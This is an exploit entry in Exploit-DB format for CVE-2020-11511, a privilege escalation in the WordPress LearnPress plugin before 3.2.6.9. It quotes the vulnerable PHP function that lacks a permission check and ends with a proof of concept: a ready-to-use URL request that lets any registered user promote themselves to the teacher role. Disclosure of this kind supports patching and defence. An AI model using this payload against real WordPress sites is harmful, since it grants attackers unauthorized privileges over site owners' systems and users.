# Exploit Title: WordPress Plugin LearnPress < 3.2.6.9 – User Registration Privilege Escalation
# https://www.exploit-db.com/exploits/50138
# https://packetstormsecurity.com/files/163538/WordPress-LearnPress-Privilege-Escalation.html
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.9
# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
# CVE: CVE-2020-11511
The function learn_press_accept_become_a_teacher can be used to boot a registered user to a trainer position, resulting in a privilege escalation. The reason is that the code doesn’t check the permissions of the requesting person, consequently letting any pupil name this feature.
This function is invoked as soon as the activated plugins have been loaded, just put the action and user_id parameters to /wpadmin/, instead of login.
function learn_press_accept_become_a_teacher() {
$action = ! empty( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
$user_id = ! empty( $_REQUEST['user_id'] ) ? $_REQUEST['user_id'] : '';
if ( ! $action || ! $user_id || ( $action != 'accept-to-be-teacher' ) ) {
return;
}
if ( ! learn_press_user_maybe_is_a_teacher( $user_id ) ) {
$be_teacher = new WP_User( $user_id );
$be_teacher->set_role( LP_TEACHER_ROLE );
delete_transient( 'learn_press_become_teacher_sent_' . $user_id );
do_action( 'learn_press_user_become_a_teacher', $user_id );
$redirect = add_query_arg( 'become-a-teacher-accepted', 'yes' );
$redirect = remove_query_arg( 'action', $redirect );
wp_redirect( $redirect );
}
}
add_action( 'plugins_loaded', 'learn_press_accept_become_a_teacher' );
...snip..
POC:
1. Find out your user id
2. Login with your cred
3. Execute the payload
http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
# Done!
Nhat Truong Blog 